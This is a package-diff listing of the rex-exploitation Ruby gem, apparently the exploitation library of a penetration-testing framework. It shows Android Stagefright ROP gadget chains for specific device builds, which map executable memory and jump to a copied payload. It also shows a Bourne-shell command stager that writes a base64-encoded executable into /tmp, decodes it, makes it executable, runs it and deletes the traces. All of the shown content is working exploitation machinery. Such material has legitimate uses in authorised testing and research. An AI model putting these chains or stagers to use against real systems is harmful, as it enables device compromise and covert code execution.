rex-exploitation 0.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
@@ -0,0 +1,225 @@
|
|
1
|
+
<?xml version="1.0" encoding="ISO-8859-1"?>
|
2
|
+
<db>
|
3
|
+
<rop>
|
4
|
+
<compatibility>
|
5
|
+
<target>lrx</target>
|
6
|
+
</compatibility>
|
7
|
+
|
8
|
+
<gadgets base="0xb66a0000">
|
9
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
10
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
11
|
+
<gadget offset="0x000042f9">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
12
|
+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
13
|
+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
14
|
+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
15
|
+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
16
|
+
<gadget offset="0x001127b8">ptr to mmap64 (less 0x20)</gadget>
|
17
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
18
|
+
<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
19
|
+
<gadget value="0xffffffff">mmap64 fd</gadget>
|
20
|
+
<gadget value="0x00000000">mmap64 fd</gadget>
|
21
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
22
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
23
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
24
|
+
<gadget offset="0x00058e63">pop {r4, pc}</gadget>
|
25
|
+
<gadget offset="0x00110438">ptr to memcpy (less 0x20)</gadget>
|
26
|
+
<gadget offset="0x00061597">pop {r1, r2, r7, pc}</gadget>
|
27
|
+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
28
|
+
<gadget value="size">memcpy length (payload size)</gadget>
|
29
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
30
|
+
<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
31
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
32
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
33
|
+
<gadget value="junk">value to be skipped (r5)</gadget>
|
34
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
35
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
36
|
+
<gadget offset="0x0002fed3">bx r0</gadget>
|
37
|
+
</gadgets>
|
38
|
+
</rop>
|
39
|
+
|
40
|
+
<rop>
|
41
|
+
<compatibility>
|
42
|
+
<target>lmy-1</target>
|
43
|
+
</compatibility>
|
44
|
+
|
45
|
+
<gadgets base="0xb66a0000">
|
46
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
47
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
48
|
+
<gadget offset="0x000bfdbf">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
49
|
+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
50
|
+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
51
|
+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
52
|
+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
53
|
+
<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
|
54
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
55
|
+
<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
56
|
+
<gadget value="0xffffffff">mmap64 fd</gadget>
|
57
|
+
<gadget value="0x00000000">mmap64 fd</gadget>
|
58
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
59
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
60
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
61
|
+
<gadget offset="0x0000f379">pop {r4, pc}</gadget>
|
62
|
+
<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
|
63
|
+
<gadget offset="0x000a1251">pop {r1, r2, r7, pc}</gadget>
|
64
|
+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
65
|
+
<gadget value="size">memcpy length (payload size)</gadget>
|
66
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
67
|
+
<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
68
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
69
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
70
|
+
<gadget value="junk">value to be skipped (r5)</gadget>
|
71
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
72
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
73
|
+
<gadget offset="0x000301a5">bx r0</gadget>
|
74
|
+
</gadgets>
|
75
|
+
</rop>
|
76
|
+
|
77
|
+
<rop>
|
78
|
+
<compatibility>
|
79
|
+
<target>lmy-2</target>
|
80
|
+
</compatibility>
|
81
|
+
|
82
|
+
<gadgets base="0xb66a0000">
|
83
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
84
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
85
|
+
<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
86
|
+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
87
|
+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
88
|
+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
89
|
+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
90
|
+
<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
|
91
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
92
|
+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
93
|
+
<gadget value="0xffffffff">mmap64 fd</gadget>
|
94
|
+
<gadget value="0x00000000">mmap64 fd</gadget>
|
95
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
96
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
97
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
98
|
+
<gadget offset="0x0000f379">pop {r4, pc}</gadget>
|
99
|
+
<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
|
100
|
+
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
|
101
|
+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
102
|
+
<gadget value="size">memcpy length (payload size)</gadget>
|
103
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
104
|
+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
105
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
106
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
107
|
+
<gadget value="junk">value to be skipped (r5)</gadget>
|
108
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
109
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
110
|
+
<gadget offset="0x0000b3bd">bx r0</gadget>
|
111
|
+
</gadgets>
|
112
|
+
</rop>
|
113
|
+
|
114
|
+
<rop>
|
115
|
+
<compatibility>
|
116
|
+
<target>shamu / LYZ28E</target>
|
117
|
+
</compatibility>
|
118
|
+
|
119
|
+
<gadgets base="0xb66a0000">
|
120
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
121
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
122
|
+
<gadget offset="0x000bfe4f">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
123
|
+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
124
|
+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
125
|
+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
126
|
+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
127
|
+
<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
|
128
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
129
|
+
<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
130
|
+
<gadget value="0xffffffff">mmap64 fd</gadget>
|
131
|
+
<gadget value="0x00000000">mmap64 fd</gadget>
|
132
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
133
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
134
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
135
|
+
<gadget offset="0x00044f71">pop {r4, pc}</gadget>
|
136
|
+
<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
|
137
|
+
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
|
138
|
+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
139
|
+
<gadget value="size">memcpy length (payload size)</gadget>
|
140
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
141
|
+
<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
142
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
143
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
144
|
+
<gadget value="junk">value to be skipped (r5)</gadget>
|
145
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
146
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
147
|
+
<gadget offset="0x0000f7cd">bx r0</gadget>
|
148
|
+
</gadgets>
|
149
|
+
</rop>
|
150
|
+
|
151
|
+
<rop>
|
152
|
+
<compatibility>
|
153
|
+
<target>shamu / LYZ28J</target>
|
154
|
+
</compatibility>
|
155
|
+
|
156
|
+
<gadgets base="0xb66a0000">
|
157
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
158
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
159
|
+
<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
160
|
+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
161
|
+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
162
|
+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
163
|
+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
164
|
+
<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
|
165
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
166
|
+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
167
|
+
<gadget value="0xffffffff">mmap64 fd</gadget>
|
168
|
+
<gadget value="0x00000000">mmap64 fd</gadget>
|
169
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
170
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
171
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
172
|
+
<gadget offset="0x00044f71">pop {r4, pc}</gadget>
|
173
|
+
<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
|
174
|
+
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
|
175
|
+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
176
|
+
<gadget value="size">memcpy length (payload size)</gadget>
|
177
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
178
|
+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
179
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
180
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
181
|
+
<gadget value="junk">value to be skipped (r5)</gadget>
|
182
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
183
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
184
|
+
<gadget offset="0x0000f83d">bx r0</gadget>
|
185
|
+
</gadgets>
|
186
|
+
</rop>
|
187
|
+
|
188
|
+
<rop>
|
189
|
+
<compatibility>
|
190
|
+
<target>sm-g900v / OE1</target>
|
191
|
+
</compatibility>
|
192
|
+
|
193
|
+
<gadgets base="0xb66a0000">
|
194
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
195
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
196
|
+
<gadget offset="0x00092b85">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
197
|
+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
198
|
+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
199
|
+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
200
|
+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
201
|
+
<gadget offset="0x0017af08">ptr to mmap64 (less 0x20)</gadget>
|
202
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
203
|
+
<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
204
|
+
<gadget value="0xffffffff">mmap64 fd</gadget>
|
205
|
+
<gadget value="0x00000000">mmap64 fd</gadget>
|
206
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
207
|
+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
208
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
209
|
+
<gadget offset="0x00065467">pop {r4, pc}</gadget>
|
210
|
+
<gadget offset="0x0017a6e4">ptr to memcpy (less 0x20)</gadget>
|
211
|
+
<gadget offset="0x0009f359">pop {r1, r2, r7, pc}</gadget>
|
212
|
+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
213
|
+
<gadget value="size">memcpy length (payload size)</gadget>
|
214
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
215
|
+
<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
216
|
+
<gadget value="junk">value to be skipped (r3)</gadget>
|
217
|
+
<gadget value="junk">value to be skipped (r4)</gadget>
|
218
|
+
<gadget value="junk">value to be skipped (r5)</gadget>
|
219
|
+
<gadget value="junk">value to be skipped (r6)</gadget>
|
220
|
+
<gadget value="junk">value to be skipped (r7)</gadget>
|
221
|
+
<gadget offset="0x0000c409">bx r0</gadget>
|
222
|
+
</gadgets>
|
223
|
+
</rop>
|
224
|
+
|
225
|
+
</db>
|
@@ -0,0 +1,11 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/exploitation/cmdstager/base'
|
4
|
+
require 'rex/exploitation/cmdstager/vbs'
|
5
|
+
require 'rex/exploitation/cmdstager/certutil'
|
6
|
+
require 'rex/exploitation/cmdstager/debug_write'
|
7
|
+
require 'rex/exploitation/cmdstager/debug_asm'
|
8
|
+
require 'rex/exploitation/cmdstager/tftp'
|
9
|
+
require 'rex/exploitation/cmdstager/bourne'
|
10
|
+
require 'rex/exploitation/cmdstager/echo'
|
11
|
+
require 'rex/exploitation/cmdstager/printf'
|
@@ -0,0 +1,189 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
require 'rex/text'
|
3
|
+
require 'rex/arch'
|
4
|
+
|
5
|
+
module Rex
|
6
|
+
module Exploitation
|
7
|
+
|
8
|
+
###
|
9
|
+
#
|
10
|
+
# This class provides an interface to generating cmdstagers.
|
11
|
+
#
|
12
|
+
###
|
13
|
+
|
14
|
+
class CmdStagerBase
|
15
|
+
|
16
|
+
def initialize(exe)
|
17
|
+
@linemax = 2047 # covers most likely cases
|
18
|
+
@exe = exe
|
19
|
+
end
|
20
|
+
|
21
|
+
#
|
22
|
+
# Generates the cmd payload including the h2bv2 decoder and encoded payload.
|
23
|
+
# The resulting commands also perform cleanup, removing any left over files
|
24
|
+
#
|
25
|
+
def generate(opts = {})
|
26
|
+
# Allow temporary directory override
|
27
|
+
@tempdir = opts[:temp]
|
28
|
+
@tempdir ||= "%TEMP%\\"
|
29
|
+
if (@tempdir == '.')
|
30
|
+
@tempdir = ''
|
31
|
+
end
|
32
|
+
|
33
|
+
opts[:linemax] ||= @linemax
|
34
|
+
|
35
|
+
generate_cmds(opts)
|
36
|
+
end
|
37
|
+
|
38
|
+
|
39
|
+
#
|
40
|
+
# This does the work of actually building an array of commands that
|
41
|
+
# when executed will create and run an executable payload.
|
42
|
+
#
|
43
|
+
def generate_cmds(opts)
|
44
|
+
|
45
|
+
# Initialize an arry of commands to execute
|
46
|
+
cmds = []
|
47
|
+
|
48
|
+
# Add the exe building commands
|
49
|
+
cmds += generate_cmds_payload(opts)
|
50
|
+
|
51
|
+
# Add the decoder script building commands
|
52
|
+
cmds += generate_cmds_decoder(opts)
|
53
|
+
|
54
|
+
compress_commands(cmds, opts)
|
55
|
+
end
|
56
|
+
|
57
|
+
|
58
|
+
#
|
59
|
+
# Generate the commands to create an encoded version of the
|
60
|
+
# payload file
|
61
|
+
#
|
62
|
+
def generate_cmds_payload(opts)
|
63
|
+
|
64
|
+
# First encode the payload
|
65
|
+
encoded = encode_payload(opts)
|
66
|
+
|
67
|
+
# Now split it up into usable pieces
|
68
|
+
parts = slice_up_payload(encoded, opts)
|
69
|
+
|
70
|
+
# Turn each part into a valid command
|
71
|
+
parts_to_commands(parts, opts)
|
72
|
+
end
|
73
|
+
|
74
|
+
#
|
75
|
+
# This method is intended to be override by the child class
|
76
|
+
#
|
77
|
+
def encode_payload(opts)
|
78
|
+
# Defaults to nothing
|
79
|
+
""
|
80
|
+
end
|
81
|
+
|
82
|
+
#
|
83
|
+
# We take a string of data and turn it into an array of parts.
|
84
|
+
#
|
85
|
+
# We save opts[:extra] bytes out of every opts[:linemax] for the parts
|
86
|
+
# appended and prepended to the resulting elements.
|
87
|
+
#
|
88
|
+
def slice_up_payload(encoded, opts)
|
89
|
+
tmp = encoded.dup
|
90
|
+
|
91
|
+
parts = []
|
92
|
+
xtra_len = opts[:extra]
|
93
|
+
xtra_len ||= 0
|
94
|
+
while (tmp.length > 0)
|
95
|
+
parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
|
96
|
+
end
|
97
|
+
|
98
|
+
parts
|
99
|
+
end
|
100
|
+
|
101
|
+
#
|
102
|
+
# Combine the parts of the encoded file with the stuff that goes
|
103
|
+
# before / after it -- example "echo " and " >>file"
|
104
|
+
#
|
105
|
+
def parts_to_commands(parts, opts)
|
106
|
+
# Return as-is
|
107
|
+
parts
|
108
|
+
end
|
109
|
+
|
110
|
+
|
111
|
+
|
112
|
+
#
|
113
|
+
# Generate the commands that will decode the file we just created
|
114
|
+
#
|
115
|
+
def generate_cmds_decoder(opts)
|
116
|
+
# Defaults to no commands.
|
117
|
+
[]
|
118
|
+
end
|
119
|
+
|
120
|
+
|
121
|
+
|
122
|
+
#
|
123
|
+
# Compress commands into as few lines as possible. Minimizes the number of
|
124
|
+
# commands to execute while maximizing the number of commands per execution.
|
125
|
+
#
|
126
|
+
def compress_commands(cmds, opts)
|
127
|
+
new_cmds = []
|
128
|
+
line = ''
|
129
|
+
|
130
|
+
concat = opts[:concat_operator] || cmd_concat_operator
|
131
|
+
|
132
|
+
# We cannot compress commands if there is no way to combine commands on
|
133
|
+
# a single line.
|
134
|
+
return cmds unless concat
|
135
|
+
|
136
|
+
cmds.each { |cmd|
|
137
|
+
|
138
|
+
# If this command will fit, concat it and move on.
|
139
|
+
if ((line.length + cmd.length + concat.length) < opts[:linemax])
|
140
|
+
line << concat if line.length > 0
|
141
|
+
line << cmd
|
142
|
+
next
|
143
|
+
end
|
144
|
+
|
145
|
+
# The command wont fit concat'd to this line, if we have something,
|
146
|
+
# we have to add it to the array now.
|
147
|
+
if (line.length > 0)
|
148
|
+
new_cmds << line
|
149
|
+
line = ''
|
150
|
+
end
|
151
|
+
|
152
|
+
# If it won't fit even after emptying the current line, error out..
|
153
|
+
if (cmd.length > opts[:linemax])
|
154
|
+
raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
|
155
|
+
end
|
156
|
+
|
157
|
+
# It will indeed fit by itself, lets add it.
|
158
|
+
line << cmd
|
159
|
+
|
160
|
+
}
|
161
|
+
new_cmds << line if (line.length > 0)
|
162
|
+
|
163
|
+
# Return the final array.
|
164
|
+
new_cmds
|
165
|
+
end
|
166
|
+
|
167
|
+
#
|
168
|
+
# Can be overriden. For exmaple, use for unix use ";" instead
|
169
|
+
#
|
170
|
+
def cmd_concat_operator
|
171
|
+
nil
|
172
|
+
end
|
173
|
+
|
174
|
+
# Should be overriden if the cmd stager needs to setup anything
|
175
|
+
# before it's executed
|
176
|
+
def setup(mod = nil)
|
177
|
+
|
178
|
+
end
|
179
|
+
|
180
|
+
#
|
181
|
+
# Should be overriden if the cmd stager needs to do any clenaup
|
182
|
+
#
|
183
|
+
def teardown(mod = nil)
|
184
|
+
|
185
|
+
end
|
186
|
+
|
187
|
+
end
|
188
|
+
end
|
189
|
+
end
|
@@ -0,0 +1,118 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
|
3
|
+
require 'rex/text'
|
4
|
+
require 'rex/arch'
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
class CmdStagerBourne < CmdStagerBase
|
10
|
+
|
11
|
+
def initialize(exe)
|
12
|
+
super
|
13
|
+
|
14
|
+
@var_encoded = Rex::Text.rand_text_alpha(5) + '.b64'
|
15
|
+
@var_decoded = Rex::Text.rand_text_alpha(5)
|
16
|
+
end
|
17
|
+
|
18
|
+
def generate(opts = {})
|
19
|
+
opts[:temp] = opts[:temp] || '/tmp/'
|
20
|
+
opts[:temp] = opts[:temp].empty?? opts[:temp] : opts[:temp] + '/'
|
21
|
+
opts[:temp] = opts[:temp].gsub(/\/{2,}/, '/')
|
22
|
+
opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
|
23
|
+
opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
|
24
|
+
if (opts[:file])
|
25
|
+
@var_encoded = opts[:file] + '.b64'
|
26
|
+
@var_decoded = opts[:file]
|
27
|
+
end
|
28
|
+
super
|
29
|
+
end
|
30
|
+
|
31
|
+
#
|
32
|
+
# Override just to set the extra byte count
|
33
|
+
#
|
34
|
+
def generate_cmds(opts)
|
35
|
+
# Set the start/end of the commands here (vs initialize) so we have @tempdir
|
36
|
+
@cmd_start = "echo -n "
|
37
|
+
@cmd_end = ">>'#{@tempdir}#{@var_encoded}'"
|
38
|
+
xtra_len = @cmd_start.length + @cmd_end.length + 1
|
39
|
+
opts.merge!({ :extra => xtra_len })
|
40
|
+
super
|
41
|
+
end
|
42
|
+
|
43
|
+
|
44
|
+
#
|
45
|
+
# Simple base64...
|
46
|
+
#
|
47
|
+
def encode_payload(opts)
|
48
|
+
Rex::Text.encode_base64(@exe)
|
49
|
+
end
|
50
|
+
|
51
|
+
|
52
|
+
#
|
53
|
+
# Combine the parts of the encoded file with the stuff that goes
|
54
|
+
# before / after it.
|
55
|
+
#
|
56
|
+
def parts_to_commands(parts, opts)
|
57
|
+
|
58
|
+
cmds = []
|
59
|
+
parts.each do |p|
|
60
|
+
cmd = ''
|
61
|
+
cmd << @cmd_start
|
62
|
+
cmd << p
|
63
|
+
cmd << @cmd_end
|
64
|
+
cmds << cmd
|
65
|
+
end
|
66
|
+
|
67
|
+
cmds
|
68
|
+
end
|
69
|
+
|
70
|
+
#
|
71
|
+
# Generate the commands that will decode the file we just created
|
72
|
+
#
|
73
|
+
def generate_cmds_decoder(opts)
|
74
|
+
decoders = [
|
75
|
+
"base64 --decode -",
|
76
|
+
"openssl enc -d -A -base64 -in /dev/stdin",
|
77
|
+
"python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
|
78
|
+
"perl -MMIME::Base64 -ne 'print decode_base64($_)'"
|
79
|
+
]
|
80
|
+
decoder_cmd = []
|
81
|
+
decoders.each do |cmd|
|
82
|
+
binary = cmd.split(' ')[0]
|
83
|
+
decoder_cmd << "(which #{binary} >&2 && #{cmd})"
|
84
|
+
end
|
85
|
+
decoder_cmd = decoder_cmd.join(" || ")
|
86
|
+
decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > '#{@tempdir}#{@var_decoded}' < '#{@tempdir}#{@var_encoded}'"
|
87
|
+
[ decoder_cmd ]
|
88
|
+
end
|
89
|
+
|
90
|
+
def compress_commands(cmds, opts)
|
91
|
+
# Make it all happen
|
92
|
+
cmds << "chmod +x '#{@tempdir}#{@var_decoded}'"
|
93
|
+
# Background the process, allowing the cleanup code to continue and delete the data
|
94
|
+
# while allowing the original shell to continue to function since it isn't waiting
|
95
|
+
# on the payload to exit. The 'sleep' is required as '&' is a command terminator
|
96
|
+
# and having & and the cmds delimiter ';' next to each other is invalid.
|
97
|
+
if opts[:background]
|
98
|
+
cmds << "'#{@tempdir}#{@var_decoded}' & sleep 2"
|
99
|
+
else
|
100
|
+
cmds << "'#{@tempdir}#{@var_decoded}'"
|
101
|
+
end
|
102
|
+
|
103
|
+
# Clean up after unless requested not to..
|
104
|
+
if (not opts[:nodelete])
|
105
|
+
cmds << "rm -f '#{@tempdir}#{@var_decoded}'"
|
106
|
+
cmds << "rm -f '#{@tempdir}#{@var_encoded}'"
|
107
|
+
end
|
108
|
+
|
109
|
+
super
|
110
|
+
end
|
111
|
+
|
112
|
+
def cmd_concat_operator
|
113
|
+
" ; "
|
114
|
+
end
|
115
|
+
|
116
|
+
end
|
117
|
+
end
|
118
|
+
end
|